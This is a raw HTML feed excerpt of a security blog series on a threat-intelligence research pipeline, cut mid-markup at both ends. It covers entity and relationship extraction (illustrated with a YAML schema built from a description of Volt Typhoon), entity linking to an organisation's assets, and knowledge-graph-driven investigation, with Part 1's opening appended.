https://substackcdn.com/image/fetch/$s_!dL0V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This is a journey, folks. A journey to find the hidden signal in the noise, the actionable insights buried within the chaos. There is something here I cannot yet fully understand but has a lot of potential, I'm exploring it and applying this practically as I go &#128506;&#65039;. One day, there will be a book about this and you will say <em>&#8220;Oh! I know that bloke, he used to write weird sh*&#8224; about active defence&#8221;</em>.</p><p>In <a href="https://www.quasarops.com/p/r1d3-threat-driven-defence-p1">Part 1 of our R1D3 Threat Driven Research Pipeline</a>, we dove headfirst into the messy world of practical threat intel research. We laid out the foundations of what a Research pipeline looks like to deliver some meaningful and actionable content to the rest of the RIDE streams&#9881;&#65039;. The diagram?</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tmgN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tmgN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 424w, https://substackcdn.com/image/fetch/$s_!tmgN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 848w, https://substackcdn.com/image/fetch/$s_!tmgN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 1272w, https://substackcdn.com/image/fetch/$s_!tmgN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tmgN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png" width="1456" height="1083" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1083,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!tmgN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 424w, https://substackcdn.com/image/fetch/$s_!tmgN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 848w, https://substackcdn.com/image/fetch/$s_!tmgN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 1272w, https://substackcdn.com/image/fetch/$s_!tmgN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe52f5133-e81c-47b1-a8a3-31d3f77d1243_2000x1488.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>By now you know that the Research phase of RIDE does not focus so much on <em>how</em> and <em>where </em>your information is sourced from, but looks at extracting actionable information for operational discovery and disruption processes further down the road.</p><p>The big question swirling in my head: what does all this data <em>really</em> mean for <em>my</em> organization? &#129300; It's a battle of brains vs. machines &#8211; we need info that machine algorithms can't easily digest whilst also being easily scalable and structured. Apparently, the true enemy isn't some shadowy hacker, but how we understand threat data, how we collate all of that, process it, build semantics around it, produce data models with it and ultimately influence security control uplifts.</p><p>What am I even talking about? &#129300;&#128513; This whole process feels delightfully experimental &#129514;. Let's call it... iterative chaos. Results may surprise us all! But if you are looking for certainty and easy-to-digest stuff please don't listen to my shenanigans! I advise seeking solace in classic industry knowledge with known buzzwords and predictable plots.</p><p>Without further ado, in this article, we will expand on the Analysis phase: <strong>Entity and Relationship Extraction</strong>, <strong>Entity Linking</strong>, a <strong>Filter Question</strong> (am I able to and should I investigate further?), and how to <strong>build our knowledge graph from our knowledge gaps</strong>.</p><h2>Analyse &#129514;</h2><h3>Step 04: Entity and Relationship Extraction &#128376;&#65039;</h3><p>Up to this stage, our data exists very much still in an unstructured shape. We have performed some very coarse initial classification by applying metadata tags and have set some boundaries around what belongs to the same body of work and what should be considered an independent one. Work done so far constitutes our first pass over the data and has generated a metadata layer, but we have not yet extracted meaningful information from our sources.</p><p>We now need to perform a second pass over the data to develop an initial semantic layer over it and convert this data into a first <strong>information layer</strong>. The backbone that will sustain this new structure is the identification of <strong>relationships</strong> and <strong>entities</strong> that are useful for our purpose. Depending on your approach to the pipeline design, you will be implicitly or explicitly defining the first few elements of a knowledge graph, i.e. extracting nodes (aka vertices) and edges (aka relations).</p><p>Initially, our unstructured open-ended questions will drive what gets identified as an entity and what doesn't, but as our research pipeline algorithm feeds from the late modelling phase back to the analysis phase, it will begin to highlight the entities that have the richest meaning and highest descriptive power in our downstream processes. We are effectively building a self-learning knowledge graph.</p><p>As an example, let's consider this extract from <a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/">Microsoft's article on Volt Typhoon</a>:</p><blockquote><p>To achieve their objective, the threat actor puts strong emphasis on stealth in this campaign, relying almost exclusively on <a href="https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/">living-off-the-land techniques</a> and hands-on-keyboard activity. They issue commands via the command line to (1) collect data, including credentials from local and network systems, (2) put the data into an archive file to stage it for exfiltration, and then (3) use the stolen valid credentials to maintain persistence. In addition, Volt Typhoon tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware. They have also been observed using custom versions of open-source tools to establish a command and control (C2) channel over proxy to further stay under the radar.</p></blockquote><p>We could break down this information into the following rudimentary schema, bear in mind that this step can either be performed by LLM models or by the analyst:</p><pre><code><code>entities:
  - type: threat_actor
    name: Volt Typhoon 

  - type: technique
    name: living-off-the-land (LOLBins)

  - type: technique
    name: hands-on-keyboard activity 

  - type: tool
    name: command line

  - type: data
    name: credentials

  - type: data
    name: archive file

  - type: device
    category: SOHO network equipment
    examples: [routers, firewalls, VPN hardware]

  - type: software
    name: open-source tools (custom versions)

  - type: protocol
    name: proxy

relationships:
  - actor: Volt Typhoon
    action: emphasizes
    target: stealth
    purpose: evading detection and increasing chances of achieving objectives

  - actor: Volt Typhoon
    action: relies on
    target: living-off-the-land techniques
    purpose: achieve mission objectives

  - actor: Volt Typhoon
    action: relies on
    target: hands-on-keyboard activity
    purpose: achieve objectives

  - actor: Volt Typhoon
    action: issues commands
    target: data (specially credentials)
    purpose: data theft

  - actor: Volt Typhoon
    action: stages data 
    target: archive file
    purpose: preparation for exfiltration

  - actor: Volt Typhoon
    action: uses
    target: stolen credentials
    purpose: maintain persistence

  - actor: Volt Typhoon
    action: routes traffic
    target: compromised SOHO network equipment
    purpose: blend into normal network activity

  - actor: Volt Typhoon
    action: uses
    target: custom versions of open-source tools
    purpose: establish command and control (C2) channel 

</code></code></pre><p>On the first few iterations of our research pipeline, we may extract these simple entities and relationships like "device" or "threat actor", however as we iterate and feedback from our explicit modelling stage, we will become better at describing richer relationships and discarding irrelevant data. For example:</p><ul><li><p>we might take a shortcut into early extraction of <a href="https://attack.mitre.org/">MITRE ATT&amp;CK TTPs</a> with varying degrees of granularity</p></li><li><p>in future iterations we may not find certain features relevant to our process anymore:</p><ul><li><p>perhaps we don't care whether the threat actor acts with "stealth" since this is normally an easy assumption, who wants to be discovered before achieving mission objectives?</p></li><li><p>we know that the majority of threat actors will want to "stage" data for exfiltration, so perhaps we want to be more granular and identify specific procedures early on</p></li></ul></li><li><p>we may add properties like timestamps, data provenance and risk-scoring metrics to each of the entities</p></li><li><p>we may enrich our data with prevalence scores of each entity or relationship, and even add potential impacts to an organization that naturally follow from the threat</p></li></ul><h3>Step 05: Entity Linking</h3><p>Once we have extracted initial entities and their primitive relationships, we have to link them to pre-existing entities in our environment that constitute relevant datapoints. This will be important in deciding whether anything here deserves further attention:</p><ul><li><p>Do any of the identified technologies exist in our CMDB?</p></li><li><p>Are the threats potentially affecting assets in the cloud or on-prem? If cloud, which cloud providers, zones, areas, resource groups?</p></li><li><p>Are any of our crown jewels linked to or running services potentially impacted by identified threats?</p></li><li><p>Are there current security controls that mitigate these threats? These security controls can be protective, detective, corrective, etc.</p></li><li><p>Have we observed internal vulnerabilities that are linked to the threats or exploits identified in the information at hand?</p></li><li><p>Have we observed incidents, alerts or notable events that can be linked to the threats we have identified?</p></li></ul><p>Entity linking is the process by which extracted data is linked to existing aspects of our unique digital landscape, this allows us to create connections that are meaningful within the environment in which we operate. Not every environment is the same, not all technology stacks behave equally, not all industries are exposed to the same threats, and not all cyber security teams are equally mature, nuances matter here.</p><h3>Step 06: Am I able to and <em>should </em>I investigate further?</h3><p>Based on the knowledge we have built from our research pipeline so far, we are now in a better position to determine the relevance of the information at hand. This is the third of six filter questions we ask ourselves along the way. <strong>A process without filter questions is a recipe for wasted time and effort.</strong></p><p>There are two key questions we must ask ourselves at this point:</p><ol><li><p>the first thing we need to ask ourselves: <strong>is this information relevant to my operational context and does it enable me to continue my investigation?</strong> We are trying to ascertain whether the information we have developed so far indicates any threats to our running operational environment, i.e. our business context, digital infrastructure, etc.</p></li><li><p>the second question is very simple: <strong>should I continue investigating further?</strong> What we are trying to find out is whether we should dedicate further resources to prepare this information for actionability by downstream processes.</p></li></ol><p>To determine whether we are able to investigate further <strong>is to define a set of criteria that are meaningful to our business</strong> vertical or operation. These criteria cannot be decided abstractly as they will be unique to your operational environment, but there are some commonalities we can point out:</p><ul><li><p>do the threats identified in the information relate to technologies our business operates with?</p></li><li><p>what kinds of threats is our organization mostly concerned about? do they roughly match the ones we have identified thus far?</p></li><li><p>what is the prevalence of the threat or threat actor in our region, industry vertical or business?</p></li><li><p>what is the criticality of the threat in terms of ease of exploitability, zero-day or already known, existing offensive tradecraft, etc?</p></li></ul><p>If we have a reasonable belief that the threats outlined so far likely apply to our digital landscape with a medium to a high degree of confidence (<em>these thresholds are up to you to experiment with</em>), but we don't fully understand how that threat may impact our operational environment, we have a knowledge gap that means our attack surface might be exposed to high risk. This risk and the unknown elements of our knowledge about it may justify our engagement in downstream processes. If this is the case, we will then flow into the next stage: investigate.</p><p>The biggest difference between the investigative stage and all the previous ones in our research pipeline is that we can essentially automate all the prior steps but we cannot automate the investigation. The next stage requires all the power of human analytical brains, automation can aid in extracting information for analysis, b<em>ut the analysis has to be done by a threat analyst in the end</em>.</p><h4>What happens if data is not relevant or I determine no further investigation is required?</h4><p>We may have reached this point and realised that the data we have is either not relevant to our operational environment or we've collected enough datapoints to decide that these threats don't pose a significant risk to our business, despite their relevance.</p><p>This might be due to a few factors, but the most important ones that can help decide our relevance score are: have we actually collected enough data and is our reconnaissance direction correct? If our recon does not need calibration, then it's a matter of collecting further data, and going through our entity extraction and linking again. If our recon direction was not correct, then we might need to decide whether we need to discard the information obtained and processed so far or simply correct our course and continue gathering.</p><p>It's important to understand that "<em>it is much better to delay the final analysis than to provide an assessment that the analyst knows is flawed"</em> (<a href="https://play.google.com/store/books/details?id=kvkxDwAAQBAJ">Intelligence-Driven Incident Response</a>, p42)</p><h3>Step 07: Investigate: Develop your Knowledge Graph from your Knowledge Gaps</h3><blockquote><p><em>Analysis, as much an art as it is a science, seeks to answer the questions that were identified in the Direction phase</em> (<a href="https://play.google.com/store/books/details?id=kvkxDwAAQBAJ">Intelligence-Driven Incident Response</a>, p41)</p></blockquote><p>Up to this point, we have produced information by extracting relevant datapoints and links from available data. All the steps leading up to the investigative stage can somehow be automated or are easier to "DevOpsify" if that is even a word. Our investigative stage though can be as complex as necessary and requires the type of cross-functional, multidomain, context-aware and nuanced understanding of us humans. The principle that guides the investigative stage is simple: <strong>Develop your Knowledge Graph from your Knowledge Gaps</strong>. These gaps are like missing links, missing nodes, or unconnected dots that need to be somehow related to our existing knowledge graph. For example:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!93Ro!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!93Ro!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 424w, https://substackcdn.com/image/fetch/$s_!93Ro!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 848w, https://substackcdn.com/image/fetch/$s_!93Ro!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 1272w, https://substackcdn.com/image/fetch/$s_!93Ro!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!93Ro!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png" width="1456" height="783" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c9dce420-8693-462b-94ad-73434930b179_2000x1076.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:783,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-analysis-diagram-01&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-analysis-diagram-01" title="threat-analysis-diagram-01" srcset="https://substackcdn.com/image/fetch/$s_!93Ro!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 424w, https://substackcdn.com/image/fetch/$s_!93Ro!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 848w, https://substackcdn.com/image/fetch/$s_!93Ro!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 1272w, https://substackcdn.com/image/fetch/$s_!93Ro!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9dce420-8693-462b-94ad-73434930b179_2000x1076.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>At every point of our research pipeline, you will notice the play between a more high-level eagle-view and a more detailed ground-level view. R1D3 recognizes the dynamics of high-level vs low-level, abstract vs concrete, and exploration vs exploitation patterns. By extracting entities and linking them with useful relationships to themselves and to entities in our environment, we develop a map of relevant datapoints that provide insight into what matters and what doesn't.</p><p>Our purpose is to transform data from its raw form to <a href="https://quasarops.com/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">an actionable form</a>. By "raw" I mean data that can either be in structured or unstructured shape, refined or un-refined, <strong>but whose existing structure so far does not allow the cyber function to drive the mechanics of risk reduction</strong>. Information is just information. What <em>you can do with it</em> is a whole different matter.</p><p>We now have information that is highly relevant to our active defence pipeline, but there is a lot we don't know yet:</p><ul><li><p>we may have failed to properly link our data to relevant security controls</p></li><li><p>we may not yet fully understand whether we have observed the attack patterns identified so far within the thousands of notable events, alerts or incidents that triggered over the last 12 months</p></li><li><p>we may actually need more granular information like the <a href="https://posts.specterops.io/on-detection-tactical-to-function-810c14798f63">actual procedures or operations</a> by which credentials can be dumped from a Windows 11 host, instead of less rich, higher level MITRE techniques</p></li><li><p>perhaps we want to identify existing defensive or offensive tradecraft leveraged in the wild (open and closed source projects, Git repos, etc.) and understand how they work</p></li><li><p>perhaps we have been asked to develop trend visualizations of the threats extracted from our research pipeline and need to collect historical data</p></li><li><p>it might be needed to investigate current and past Pentest, Red Team or Purple Team engagements to understand what gaps have been closed, which ones still remain, and how these relate to our knowledge of extracted threats so far</p></li><li><p>we might want to reverse-engineer malware samples or dynamically run them through a sandbox to understand how they work</p></li></ul><p>Whatever your knowledge gap is, you need to delve deeper now into specific aspects of your information and develop your knowledge graph further. By knowledge graph I mean an implicit construct in your mind or an explicit graph database you populate at each step, this is up to you.</p><h2>Next Steps</h2><p>The information refinement that has taken place so far has been strongly surfaced by implicit models and schemas, things that live in the brains of intel or security analysts but have not been explicitly defined to sustain the test of higher OODA loops and scales. To unlock the full potential of your threat research, you need to transform this raw information into actionable models. Think of it like building a blueprint, where scattered data becomes a structured plan. In the next part of the series, we'll explore an aspect of threat research that many hunt, detection engineering, incident response and SOC teams usually ignore and don't think about much.</p><p>Until then, I wish you all a great week, stay tuned and drop me your comments below!</p>]]></content:encoded></item><item><title><![CDATA[🔮R1D3 Threat Driven Research Pipeline - Part 1]]></title><description><![CDATA[We focus on the first phase (Research) of the RIDE active defence framework, emphasizing the importance of efficient research in threat intelligence, specifically extracting meaning from unstructured data like reports and summaries to improve security controls. The article introduces a research data pipeline with steps for collecting, classifying, and analyzing threat information, using Microsoft's report on Volt Typhoon as an example.]]></description><link>https://www.quasarops.com/p/r1d3-threat-driven-defence-p1</link><guid isPermaLink="false">https://www.quasarops.com/p/r1d3-threat-driven-defence-p1</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Fri, 19 Apr 2024 02:30:52 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/0a065589-bf76-458f-a297-4935e7fd6d7a_2000x1488.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0PYc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0PYc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 424w, https://substackcdn.com/image/fetch/$s_!0PYc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 848w, https://substackcdn.com/image/fetch/$s_!0PYc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 1272w, https://substackcdn.com/image/fetch/$s_!0PYc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0PYc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4986c706-779a-4854-8647-161c19e72540_2000x1488.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&#128302;R1D3 Threat Driven Research Pipeline - Part 1&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" title="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" srcset="https://substackcdn.com/image/fetch/$s_!0PYc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 424w, https://substackcdn.com/image/fetch/$s_!0PYc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 848w, https://substackcdn.com/image/fetch/$s_!0PYc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 1272w, https://substackcdn.com/image/fetch/$s_!0PYc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4986c706-779a-4854-8647-161c19e72540_2000x1488.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>In <a href="https://quasarops.com/p/threat-hunt-vs-detection-engineering-the-saga-continues/">my last post</a> I introduced the <strong>RIDE</strong> (R1D3) Framework for Active Defence. I outlined there the four basic phases of an active defence pipeline: <strong>Research, Discovery, Disruption and Development</strong>. In this article, I will describe the first phase (the <strong>R</strong> in R1D3) in detail. I've scheduled Part 1 to be released today and Part 2 is already scheduled for next week ;)&#9993;&#65039;</p><p>I've intentionally made this post a lot shorter than my usual ones because I realise that in today's distraction economy, it's really hard to get ideas across without losing momentum. These words have to battle the noise of my reader's busy life and I really appreciate the few minutes you dedicate to my crazy rumblings. Or perhaps, I am simply learning how to write better? Dunno, time will tell! Before I continue, if you want to get in touch with me, simply reach out to diego.perez@quasarops.com. Now back to our main topic &#128515;</p><p>Research is the entry door into our active defence pipeline, which has huge downstream ramifications. If our initial research is inefficient, we will significantly reduce the likelihood of influencing security control uplifts in subsequent stages.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GQeI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 